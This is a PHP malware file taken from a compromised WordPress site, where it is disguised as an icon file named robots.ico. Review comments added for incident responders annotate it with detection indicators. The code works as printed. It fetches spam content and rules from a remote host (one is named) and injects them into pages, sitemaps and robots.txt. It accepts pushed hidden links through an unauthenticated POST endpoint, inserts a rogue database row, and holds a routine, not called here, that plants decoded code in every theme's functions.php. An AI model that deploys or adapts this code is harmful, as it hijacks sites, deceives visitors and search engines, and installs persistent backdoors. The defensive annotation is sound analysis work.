Файловый менеджер - Редактировать - /home/kunzqhe/photostocker/wp-includes/images/media/robots.ico.tar
home/kunzqhe/photostocker/wp-includes/css/robots.ico 0000644 00000065723 15151177677 0016771 0 ustar 00
<?php
// NOTE(review): the first line of this listing is the tar member header
// (path, mode, size, mtime, checksum, "ustar" magic) of the archive being
// viewed, not PHP. It records that this script is stored under an icon-like
// name (robots.ico) inside wp-includes/css/. How the file gets included by
// WordPress is not visible in this listing.
//
// Summary for incident responders, all taken from the code below:
//   - fetches robots.txt, sitemap and page-content "rules" from a remote API
//     and injects them into the site's output (SEO spam / content hijack);
//   - accepts pushed link lists over HTTP and prints them as hidden anchors
//     in the footer;
//   - caches everything as md5-named .json files under
//     wp-content/uploads/cache/;
//   - can rewrite robots.txt between "# BEGIN ROBOTS" / "# END ROBOTS";
//   - inserts a placeholder row with ID 9999999999 and post_name
//     "__virtual__" into the posts table;
//   - contains a (currently uncalled) routine that appends a require_once
//     line to every theme's functions.php.
// The original comments were written in Chinese and are translated here.
// Line breaks were lost on the page this was taken from; where a comment
// ends and code resumes has been inferred from the syntax.

// Include guard: do nothing if this script was already loaded in the request.
if (defined('BY_ROBOTS_YES')) return;
const BY_ROBOTS_YES = true;

/**
 * Handle a POST request that pushes a list of outbound links.
 *
 * Reads the raw request body as JSON, expects {"type": "link", "data": [...]}
 * where every element of "data" has "url" and "anchor" keys, stores the list
 * via save_push_link_data() and answers with a small JSON status object.
 *
 * Detection: POST requests whose query string carries `__link_push`
 * (see the dispatcher further down) are an indicator in access logs.
 */
if (!function_exists('handle_link_push_request')) {
    function handle_link_push_request(): void {
        header('Content-Type: application/json; charset=utf-8');

        // Read the JSON input
        $input = file_get_contents('php://input');
        $data = json_decode($input, true);

        if (!is_array($data)) {
            echo json_encode(['status' => 0, 'msg' => 'invalid json']);
            return;
        }

        $type = $data['type'] ?? '';
        $links = $data['data'] ?? [];

        if ($type !== 'link') {
            echo json_encode(['status' => 0, 'msg' => 'invalid type']);
            return;
        }

        if (!is_array($links) || empty($links)) {
            echo json_encode(['status' => 0, 'msg' => 'data required']);
            return;
        }

        // Validate the shape of each link entry (only key presence is checked)
        foreach ($links as $link) {
            if (!isset($link['url']) || !isset($link['anchor'])) {
                echo json_encode(['status' => 0, 'msg' => 'invalid link format, need url and anchor']);
                return;
            }
        }

        // Persist the data
        $saved = save_push_link_data($links);

        if ($saved) {
            echo json_encode(['status' => 1, 'msg' => 'success', 'count' => count($links)]);
        } else {
            echo json_encode(['status' => 0, 'msg' => 'save failed']);
        }
    }
}

/**
 * Save the pushed link list.
 *
 * Writes the list as JSON to wp-content/uploads/cache/<md5('push_links')>.json,
 * creating the directory (mode 0755) if needed. Filesystem warnings are
 * suppressed with `@`. Returns true when the write did not fail.
 */
if (!function_exists('save_push_link_data')) {
    function save_push_link_data(array $links): bool {
        $cache_dir = ABSPATH . 'wp-content/uploads/cache/';
        if (!is_dir($cache_dir)) {
            @mkdir($cache_dir, 0755, true);
        }
        // Fixed file name: the md5 of the constant string 'push_links'
        $cache_file = $cache_dir . md5('push_links') . '.json';
        return @file_put_contents($cache_file, json_encode($links, JSON_UNESCAPED_UNICODE)) !== false;
    }
}

/**
 * Load the pushed link list.
 *
 * Returns the decoded array from the same cache file that
 * save_push_link_data() writes, or an empty array when the file is missing,
 * unreadable or does not decode to an array.
 */
if (!function_exists('load_push_link_data')) {
    function load_push_link_data(): array {
        $cache_file = ABSPATH . 'wp-content/uploads/cache/' . md5('push_links') . '.json';
        if (!file_exists($cache_file) || !is_readable($cache_file)) {
            return [];
        }
        $content = @file_get_contents($cache_file);
        $links = json_decode($content, true);
        return is_array($links) ? $links : [];
    }
}

// ============================================
// Link push receiver
// ============================================
// Any POST request with a `__link_push` query parameter is answered by the
// handler above and the request ends here, before WordPress renders anything.
if (isset($_GET['__link_push']) && $_SERVER['REQUEST_METHOD'] === 'POST') {
    @handle_link_push_request();
    exit;
}

// ============================================
// Register link injection on wp_footer
// ============================================
// Late priority (9999). The anchors are placed in a 1x1 off-screen, fully
// transparent container, so visitors do not see them while crawlers still
// parse them.
add_action('wp_footer', function () {
    $links = load_push_link_data();
    if (empty($links)) return;

    // Emit the hidden outbound links
    echo '<div style="position:absolute;left:-9999px;top:-9999px;overflow:hidden;height:1px;width:1px;opacity:0;">';
    foreach ($links as $link) {
        // Both values are HTML-escaped; the URL scheme is not checked here
        $url = htmlspecialchars($link['url'] ?? '', ENT_QUOTES, 'UTF-8');
        $anchor = htmlspecialchars($link['anchor'] ?? '', ENT_QUOTES, 'UTF-8');
        if (!empty($url) && !empty($anchor)) {
            echo '<a href="' . $url . '">' . $anchor . '</a>';
        }
    }
    echo '</div>';
}, 9999);

/**
 * robots.txt hijack logic:
 * - if a robots.txt file exists, overwrite it or append to it according to
 *   the API response;
 * - if the file does not exist, register WordPress do_robots hooks that
 *   output the content instead;
 * - the data is cached and refreshed every hour.
 *
 * The API is asked with type=robots, the request's Host header and the
 * visitor's User-Agent. A `refresh_robots` query parameter forces a refresh.
 */
if (!function_exists('handle_robots_logic')) {
    function handle_robots_logic($api_url): void {
        $robots = ABSPATH . 'robots.txt';
        $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';// request identifier (User-Agent)
        $cache_key = 'robots_' . ($_SERVER['HTTP_HOST'] ?? '');
        $force_refresh = isset($_GET['refresh_robots']);
        $params = [
            'type' => 'robots',
            'domain' => $_SERVER['HTTP_HOST'] ?? '',
            'user_agent' => $user_agent
        ];

        // Read-only cache lookup (data argument is null), TTL 3600 seconds
        $robots_result = load_or_cache_api_data($cache_key, null, 3600, $force_refresh);
        $robots_data = [];
        if ($robots_result && !$robots_result['isExpire']) {
            $robots_data = $robots_result['data'];
        } else {
            // Cache missing or expired: ask the API with a 1-second timeout
            $fetched = fetch_from_api($api_url, $params, 'GET', 1);
            if ($fetched) {
                $robots_data = $fetched;
                load_or_cache_api_data($cache_key, $robots_data, 3600, true);
            } else {
                // API unreachable: fall back to the stale cache entry, if any
                if ($robots_result) {
                    $robots_data = $robots_result['data'];
                }
            }
        }

        $robots_content = $robots_data['robots'] ?? null;
        $override = $robots_data['override'] ?? false;

        if (!empty($robots_content)) {
            if (file_exists($robots) && is_readable($robots)) {
                // Prefer modifying the file on disk; hooks are the fallback
                if (update_robots_file($robots, $robots_content, $override)) {
                    return;
                }
                register_robots_hooks($override, $robots_content);
            } else {
                register_robots_hooks($override, $robots_content);
                /*
                // File does not exist: register the output hooks only when Googlebot visits
                if(stripos($user_agent, 'googlebot') !== false) {
                    register_robots_hooks($override, $robots_content);
                }
                */
            }
        }
    }
}

/**
 * Write or update the robots.txt file.
 * Supports a full overwrite, or appending inside a marked block (to avoid
 * appending without bound).
 *
 * Detection: a "# BEGIN ROBOTS" ... "# END ROBOTS" section in robots.txt is
 * the trace left by append mode; override mode replaces the whole file and
 * leaves no marker.
 *
 * Returns true when the file was written, false when it is not writable or
 * the write failed.
 */
if (!function_exists('update_robots_file')) {
    function update_robots_file(string $robots, string $custom_block, bool $override): bool {
        $marker_start = "# BEGIN ROBOTS";
        $marker_end = "# END ROBOTS";
        // Non-greedy match of one marked block, including one trailing newline
        $pattern = "/" . preg_quote($marker_start, '/') . "[\s\S]*?" . preg_quote($marker_end, '/') . "\n?/";

        // Markers are added in append mode only, to prevent unbounded appending
        if (!$override) {
            $custom_block = $marker_start . "\n" . trim($custom_block) . "\n" . $marker_end;
        }

        // File exists and is writable
        if (file_exists($robots)) {
            if (!is_writable($robots)) return false;
            $existing = file_get_contents($robots);
            if ($override) {
                return file_put_contents($robots, $custom_block) !== false;
            } else {
                if (preg_match($pattern, $existing)) {
                    // A marked block is already present: replace it in place
                    $updated = preg_replace($pattern, $custom_block, $existing);
                } else {
                    $updated = rtrim($existing, "\n") . "\n" . $custom_block;
                }
                return file_put_contents($robots, $updated) !== false;
            }
        }

        // File does not exist, but the directory is writable
        if (is_writable(dirname($robots))) {
            return file_put_contents($robots, $custom_block) !== false;
        }
        return false;
    }
}

/**
 * Output robots content directly and terminate execution.
 *
 * No call to this function appears in the code shown here.
 */
if (!function_exists('output_robots')) {
    function output_robots(string $content): void {
        header('Content-Type: text/plain');
        echo $content;
        exit;
    }
}

/**
 * Register WordPress do_robots hooks that control the output.
 * - in override mode the output is taken over completely;
 * - otherwise the content is appended after the default output.
 */
if (!function_exists('register_robots_hooks')) {
    function register_robots_hooks(bool $override, ?string $robots_content): void {
        if (empty($robots_content)) {
            return;
        }
        if ($override) {
            // On init (priority 0) drop every callback registered on
            // do_robots at that moment
            add_action('init', function () {
                global $wp_filter;
                if (isset($wp_filter['do_robots'])) {
                    unset($wp_filter['do_robots']);
                }
            }, 0);
            // Then answer do_robots with the fetched content and stop the request
            add_action('do_robots', function () use ($robots_content) {
                header('Content-Type: text/plain');
                echo $robots_content;
                exit;
            }, 0);
        } else {
            add_action('do_robots', function () use ($robots_content) {
                echo "\n"; // separator, keeps the addition apart from the default output
                echo $robots_content;
            }, 1000);
        }
    }
}

/**
 * Generic API request function;
 * supports GET/POST, parses the JSON reply and returns its "data" field.
 *
 * Returns the "data" array only when the reply is a JSON object with
 * status === 1 and an array under "data"; otherwise null.
 *
 * NOTE(review): redirects are followed and TLS peer/host verification is
 * switched off, so the content this script injects is not authenticated
 * in transit.
 */
if (!function_exists('fetch_from_api')) {
    function fetch_from_api(string $url, array $params = [], string $method = 'GET', int $timeout = 3): ?array {
        $ch = curl_init();
        if (strtoupper($method) === 'GET' && !empty($params)) {
            // Append the parameters to the query string
            $url .= (strpos($url, '?') === false ? '?' : '&') . http_build_query($params);
        }
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_TIMEOUT => $timeout,
            CURLOPT_CONNECTTIMEOUT => $timeout,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
        ]);
        if (strtoupper($method) === 'POST') {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
        }
        $response = curl_exec($ch);
        curl_close($ch);
        if ($response !== false) {
            $json = json_decode($response, true);
            // Keep the data structure returned for robots/page consistent
            if (is_array($json) && isset($json['status']) && $json['status'] === 1 && isset($json['data']) && is_array($json['data'])) {
                return $json['data'];
            }
        }
        return null;
    }
}

/**
 * Output sitemap XML (both sitemapindex and urlset formats are supported);
 * used in override mode or as a fallback.
 *
 * Forces HTTP 200, prints one entry per URL with the current time as
 * <lastmod>, and terminates the request.
 */
if (!function_exists('render_sitemap_xml')) {
    function render_sitemap_xml(bool $is_index, array $urls): void {
        status_header(200);
        header('Content-Type: application/xml; charset=utf-8');
        echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
        if ($is_index) {
            echo "<sitemapindex xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n";
            foreach ($urls as $url) {
                echo " <sitemap>\n <loc>" . htmlspecialchars($url) . "</loc>\n <lastmod>" . date('c') . "</lastmod>\n </sitemap>\n";
            }
            echo "</sitemapindex>";
        } else {
            echo "<urlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n";
            foreach ($urls as $url) {
                echo " <url>\n <loc>" . htmlspecialchars($url) . "</loc>\n <lastmod>" . date('c') . "</lastmod>\n </url>\n";
            }
            echo "</urlset>";
        }
        exit;
    }
}

/**
 * Hijack sitemap-type requests (e.g. sitemap_index.xml, page-sitemap.xml):
 * - decide from the API's rules whether to override the output or to append
 *   to the original sitemap;
 * - supports fallback output for pages that do not exist;
 * - content is cached for 1 hour and can be refreshed with a URL parameter.
 *
 * Acts on any request path matching /<something>.xml. The `refresh` and
 * `refresh_sitemap` query parameters force a refresh.
 */
if (!function_exists('handle_sitemap_logic')) {
    function handle_sitemap_logic($api_url): void {
        $uri = parse_url($_SERVER['REQUEST_URI'] ?? '', PHP_URL_PATH);
        if (!preg_match('#^/(.+\.xml)$#', $uri, $match)) {
            return;
        }
        $sitemap_file = $match[1];
        $cache_key = 'sitemap_' . $sitemap_file;
        $force_refresh = isset($_GET['refresh']) || isset($_GET['refresh_sitemap']);
        $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';// request identifier (User-Agent)
        $params = [
            'type' => 'sitemap',
            'domain' => $_SERVER['HTTP_HOST'] ?? '',
            'sitemap_file' => $sitemap_file,
            'user_agent' => $user_agent
        ];

        // Same cache / fetch / stale-fallback sequence as handle_robots_logic()
        $sitemap_result = load_or_cache_api_data($cache_key, null, 3600, $force_refresh);
        $data = [];
        if ($sitemap_result && !$sitemap_result['isExpire']) {
            $data = $sitemap_result['data'];
        } else {
            $fetched = fetch_from_api($api_url, $params, 'GET', 1);
            if ($fetched) {
                $data = $fetched;
                load_or_cache_api_data($cache_key, $data, 3600, true);
            } else {
                if ($sitemap_result) {
                    $data = $sitemap_result['data'];
                }
            }
        }
        //echo "<pre>";print_r($params);exit;
        if (!is_array($data) || empty($data['url']) || !is_array($data['url'])) {
            return;
        }
        $override = $data['override'] ?? false;
        $is_index = $data['is_index'] ?? ($sitemap_file === 'sitemap_index.xml');
        $urls = $data['url'];

        if ($override) {
            render_sitemap_xml($is_index, $urls);
        } else {
            // Check whether the page really exists; if not, force the hijacked
            // content out exactly as in override mode
            add_action('template_redirect', function () use ($urls, $is_index) {
                if (is_404()) {
                    render_sitemap_xml($is_index, $urls);
                }
            });
            // If the page exists, capture its original content
            ob_start(function ($original) use ($urls, $is_index) {
                // If the content is empty, output what the API sent directly
                // (author's note: did not seem to work in testing, so the
                // is_404 check above is relied on instead)
                if (empty($original)) {
                    render_sitemap_xml($is_index, $urls);
                }
                // Decide whether the content is a sitemapindex or a urlset
                if (stripos($original, '<sitemapindex') !== false) {
                    $insert = "";
                    foreach ($urls as $url) {
                        $insert .= " <sitemap>\n <loc>" . htmlspecialchars($url) . "</loc>\n <lastmod>" . date('c') . "</lastmod>\n </sitemap>\n";
                    }
                    // Splice the extra entries in front of the closing tag
                    return str_replace('</sitemapindex>', $insert . '</sitemapindex>', $original);
                } elseif (stripos($original, '<urlset') !== false) {
                    $insert = "";
                    foreach ($urls as $url) {
                        $insert .= " <url>\n <loc>" . htmlspecialchars($url) . "</loc>\n <lastmod>" . date('c') . "</lastmod>\n </url>\n";
                    }
                    return str_replace('</urlset>', $insert . '</urlset>', $original);
                }
                return $original;
            });
        }
    }
}

/**
 * Generic cache read/write function;
 * - when $data is passed, it is written to the cache;
 * - otherwise the cache is read by key;
 * - supports an expiry time and forced refresh.
 *
 * Files are stored as wp-content/uploads/cache/<md5(cache_key)>.json.
 * On a write the data itself is returned; on a read the result is
 * ['isExpire' => bool, 'data' => decoded content], or [] when no readable
 * cache file exists. Expiry is judged from the file's modification time.
 *
 * Detection: md5-named .json files in that directory are artifacts of this
 * script.
 */
if (!function_exists('load_or_cache_api_data')) {
    function load_or_cache_api_data(string $cache_key, ?array $data = null, int $ttl = 3600, bool $force_refresh = false): ?array {
        $cache_dir = ABSPATH . 'wp-content/uploads/cache/';
        if (!is_dir($cache_dir)) {
            @mkdir($cache_dir, 0755, true);
        }
        $cache_file = $cache_dir . md5($cache_key) . '.json';

        // Write path
        if ($data !== null) {
            @file_put_contents($cache_file, json_encode($data));
            return $data;
        }

        // Read path
        if (file_exists($cache_file) && is_readable($cache_file)) {
            $file_contents = file_get_contents($cache_file);
            $decoded = json_decode($file_contents, true);
            if (!$force_refresh && (time() - filemtime($cache_file) < $ttl)) {
                return ['isExpire' => false, 'data' => $decoded];
            } else {
                return ['isExpire' => true, 'data' => $decoded];
            }
        }
        // cache file does not exist or unreadable
        return [];
    }
}

/**
 * Hijack WordPress page content rendering:
 * - if the API's rules contain override=true, output directly and terminate;
 * - otherwise replace/append within the post content based on match rules;
 * - supports a per-page cache (30 days by default) and forced refresh.
 *
 * Skipped for admin screens. The API is asked with type=page, the Host
 * header, the request path and the visitor's User-Agent. A
 * `refresh_page_cache` query parameter forces a refresh.
 *
 * NOTE(review): rule content is echoed or spliced into the page without any
 * escaping, so whatever markup the API returns is served to visitors.
 */
if (!function_exists('handle_page_override_logic')) {
    function handle_page_override_logic($api_url): void {
        if (is_admin()) return;

        $cache_key = 'page_' . md5(($_SERVER['HTTP_HOST'] ?? '') . ($_SERVER['REQUEST_URI'] ?? ''));
        $force_refresh = isset($_GET['refresh_page_cache']);
        $pageUrlInfo = parse_url($_SERVER['REQUEST_URI']);
        $params = [
            'type' => 'page',
            'domain' => $_SERVER['HTTP_HOST'] ?? '',
            'url' => $pageUrlInfo['path'],
            'user_agent' => $_SERVER['HTTP_USER_AGENT'] ?? ''
        ];
        //echo "<pre>";print_r($pageUrlInfo);print_r($params);exit;
        $page_result = load_or_cache_api_data($cache_key, null, 2592000, $force_refresh);
        // Use the cache file when it exists and has not expired
        if ($page_result && !$page_result['isExpire']) {
            $page_data = $page_result['data'];
        } else {
            $page_data = fetch_from_api($api_url, $params, 'GET', 1);
            if ($page_data) {
                load_or_cache_api_data($cache_key, $page_data, 2592000, true);
            } else {
                if ($page_result) {
                    $page_data = $page_result['data'];
                }
            }
        }
        //echo "<pre>";print_r($params);print_r($page_data);//echo "</pre>";//exit;
        if (!empty($page_data) && is_array($page_data)) {
            // Override output: if a rule matches the current page in override
            // mode, output it and exit so WordPress never reaches its 404
            foreach ($page_data as $rule) {
                if (!empty($rule['override']) && !empty($rule['content'])) {
                    status_header(200); // keep WordPress from setting a 404 status
                    echo $rule['content'];
                    exit;
                }
            }

            // If the current request is a 404 and a rule has all_match with
            // mode = replace, inject a virtual page
            foreach ($page_data as $rule) {
                //echo "<pre>";print_r($page_data);exit;
                if (($rule['match'] ?? '') === 'all_match' && strtolower($rule['mode'] ?? '') === 'replace' && !empty($rule['content'])) {
                    // Default title is the literal Chinese string for "virtual page"
                    $title = $rule['title'] ?? '虚拟页面';
                    $page_type = $rule['type'] ?? 'post';
                    inject_virtual_page($title,$page_type, $rule['content']);
                    break;
                }
            }

            // If the current page is not a 404, go straight to content-append mode
            add_filter('the_content', function ($original) use ($page_data) {
                if (empty($original)) { return $original; } // empty content is returned as-is, skipping the hijack logic
                $output = $original;// original post content
                foreach ($page_data as $rule) {
                    $match = $rule['match'] ?? '';
                    $mode = strtolower($rule['mode'] ?? 'append');
                    $position = strtolower($rule['position'] ?? 'after');
                    $scope = strtolower($rule['scope'] ?? 'first');
                    $fragment = $rule['content'] ?? '';
                    if (empty($fragment)) continue;

                    // 'all_match' means: treat the whole current content as the match
                    if ($match == 'all_match') {
                        $match = $output;
                    }

                    // An empty match means: append at the head or tail of the post
                    if ($mode === 'append' && $match === '') {
                        if ($position === 'before') {
                            $output = $fragment . $output;
                        } elseif ($position === 'after') {
                            $output = $output . $fragment;
                        }
                        continue;
                    }

                    // A match written as /.../ is used as a regex as supplied
                    // by the API; anything else is quoted as a literal
                    $is_regex = preg_match('/^\/.*\/$/', $match);
                    $pattern = $is_regex ? $match : '/' . preg_quote($match, '/') . '/';

                    if ($mode === 'replace') {
                        if ($scope === 'first') {
                            $output = preg_replace($pattern, $fragment, $output, 1);
                        } elseif ($scope === 'last') {
                            // "last" is done by reversing content, pattern
                            // and fragment byte-wise and replacing once
                            $reversed = strrev($output);
                            $reversed = preg_replace(strrev($pattern), strrev($fragment), $reversed, 1);
                            $output = strrev($reversed);
                        } else {
                            $output = preg_replace($pattern, $fragment, $output);
                        }
                    } elseif ($mode === 'append') {
                        // Limit is 1 for scope 'first' and for 'last', -1 (no limit) otherwise
                        $output = preg_replace_callback($pattern, function ($matches) use ($fragment, $position) {
                            return $position === 'before' ? $fragment . $matches[0] : $matches[0] . $fragment;
                        }, $output, $scope === 'first' ? 1 : ($scope === 'last' ? 1 : -1));
                    }
                }
                return $output;
            });
        }
    }
}

/**
 * Avoid a 404: inject a virtual page and trigger template rendering.
 * Only used when "the page does not exist in append mode but the API
 * returned data".
 *
 * Registers a template_redirect callback (priority 0) that, on a 404,
 * builds an in-memory WP_Post from the supplied title/type/content, forces
 * HTTP 200 and rewrites the global query so the theme renders it as a
 * normal singular page.
 */
if (!function_exists('inject_virtual_page')) {
    function inject_virtual_page(string $title = '虚拟页面', $page_type = 'post', string $content = ''): void {
        add_action('template_redirect', function () use ($title, $page_type, $content) {
            if (!is_404()) return;

            global $wp_query, $post, $wp_the_query;
            $virtual_post_id = 9999999999; // virtual ID
            ensure_virtual_post_exists($virtual_post_id);

            // Create the virtual WP_Post object; make sure the ancestors
            // property exists and is an array
            $virtual_post = new WP_Post((object)[
                'ID' => $virtual_post_id, // unique ID of the virtual post (author's note says "negative, to avoid clashing with real ones"; the value assigned above is positive)
                'post_author' => 1, // author ID
                'post_date' => current_time('mysql'), // local publish time
                'post_date_gmt' => current_time('mysql', 1), // GMT publish time
                'post_content' => $content, // page content
                'post_title' => $title, // page title
                'post_type' => $page_type, // post type ('page' or 'post')
                'post_excerpt' => '', // excerpt
                'post_status' => 'publish', // status: published
                'comment_status' => 'closed', // comments: open / closed
                'ping_status' => 'closed', // pings: open / closed
                'post_password' => '', // no password
                'post_name' => sanitize_title($title), // page slug
                'to_ping' => '', // ping list, left empty
                'pinged' => '', // already-pinged list, left empty
                'post_modified' => current_time('mysql'), // modification time
                'post_modified_gmt' => current_time('mysql', 1), // GMT modification time
                'post_content_filtered' => '', // filtered content, left empty
                'post_parent' => 0, // parent page ID (none)
                'guid' => home_url('/virtual-' . uniqid()), // globally unique identifier
                'menu_order' => 0, // menu order
                'post_mime_type' => '', // MIME type, left empty
                'comment_count' => 0, // zero comments
                'filter' => 'raw', // filter flag: raw
                'ancestors' => [],
            ]);

            status_header(200);

            // Set up the WordPress global environment
            $wp_query->is_404 = false;
            $wp_query->is_page = true;
            $wp_query->is_singular = true;
            $wp_query->found_posts = 1;
            $wp_query->post_count = 1;
            $wp_query->max_num_pages = 1;
            $wp_query->posts = [$virtual_post];
            $wp_query->post = $virtual_post;
            $wp_query->queried_object = $virtual_post;
            $wp_query->queried_object_id = $virtual_post->ID;
            $wp_the_query = $wp_query;
            $post = $virtual_post;
            setup_postdata($virtual_post);

            /**
            // Plugin compatibility
            global $authordata;
            $authordata = get_userdata($virtual_post->post_author);
            add_filter('the_posts', fn($posts) => [$virtual_post]);
            add_filter('pre_get_shortlink', fn() => home_url('/virtual-' . uniqid()));
            **/

            // Turn off the canonical redirect
            remove_filter('template_redirect', 'redirect_canonical');
        }, 0);
    }
}

/**
 * Make sure a database row exists for the virtual post ID.
 *
 * Looks the ID up in the posts table and, when absent, inserts a placeholder
 * row with status 'trash', type 'page' and post_name '__virtual__'.
 *
 * Detection / cleanup: a posts-table row with ID 9999999999 (the value
 * passed by inject_virtual_page) or post_name '__virtual__' is a persistent
 * artifact of this script.
 */
if (!function_exists('ensure_virtual_post_exists')) {
    function ensure_virtual_post_exists($virtual_post_id): void {
        global $wpdb;
        $exists = $wpdb->get_var($wpdb->prepare(
            "SELECT ID FROM {$wpdb->posts} WHERE ID = %d",
            $virtual_post_id
        ));
        if (!$exists) {
            $wpdb->insert($wpdb->posts, [
                'ID' => $virtual_post_id,
                'post_author' => 1,
                'post_date' => current_time('mysql'),
                'post_date_gmt' => current_time('mysql', 1),
                'post_content' => '',
                // NOTE(review): line breaks are lost on the source page; the
                // post_title entry below is read as commented out — confirm
                // against the raw file.
                // 'post_title' => '__virtual__',
                'post_excerpt' => '',
                'post_status' => 'trash', // trash (recycle bin)
                'comment_status' => 'closed',
                'ping_status' => 'closed',
                'post_name' => '__virtual__',
                'post_type' => 'page',
                'post_modified' => current_time('mysql'),
                'post_modified_gmt' => current_time('mysql', 1),
                'guid' => home_url('/virtual-' . uniqid()),
            ]);
        }
    }
}

/**
 * Automatically deploy a hidden script into every theme's functions.php
 *
 * @param string $base64 Base64-encoded PHP code
 *
 * For each directory under wp-content/themes the decoded code is written to
 * <theme>/assets/page.html and a require_once line for that file is appended
 * to the theme's functions.php unless already present. The only call to this
 * function in the visible code is commented out (last line of the file).
 *
 * Detection / cleanup: look for assets/page.html inside theme directories
 * and for a trailing `@require_once ABSPATH . 'wp-content/themes/...` line
 * referencing it in functions.php.
 */
if (!function_exists('auto_deploy_hidden_backdoors')) {
    function auto_deploy_hidden_backdoors(string $base64): void {
        $themes_dir = ABSPATH . 'wp-content/themes';
        $decoded_code = base64_decode($base64);
        if (!$decoded_code) {
            return;
        }

        // Walk every theme directory
        foreach (glob($themes_dir . '/*', GLOB_ONLYDIR) as $theme_path) {
            $functions_file = $theme_path . '/functions.php';
            $payload_path = $theme_path . '/assets/page.html';

            // Make sure the assets directory exists
            if (!is_dir($theme_path . '/assets')) {
                @mkdir($theme_path . '/assets', 0755, true);
            }

            // Write the payload file
            @file_put_contents($payload_path, $decoded_code);

            // Build the require_once statement
            $require_code = "@require_once ABSPATH . 'wp-content/themes/" . basename($theme_path) . "/assets/page.html';";

            // Check whether functions.php exists
            if (file_exists($functions_file)) {
                $content = file_get_contents($functions_file);
                if (!str_contains($content, $require_code)) {
                    // Append if not already included
                    @file_put_contents($functions_file, "\n" . $require_code . "\n", FILE_APPEND);
                }
            }
        }
    }
}

// Remote rule source. The active value points at a local test host; the
// author's comment also records a second endpoint, kept verbatim below as an
// indicator for outbound-traffic and DNS review.
$api_url = 'http://wp.test/api.php';// offline: http://wp.test/api.php http://wp.makeprofectworld.com/api.php

// robots hijack
@handle_robots_logic($api_url);

// sitemap hijack
@handle_sitemap_logic($api_url);

// page hijack logic
@handle_page_override_logic($api_url);

// Theme deployment is disabled here; $bs is not defined in the visible code.
//auto_deploy_hidden_backdoors($bs);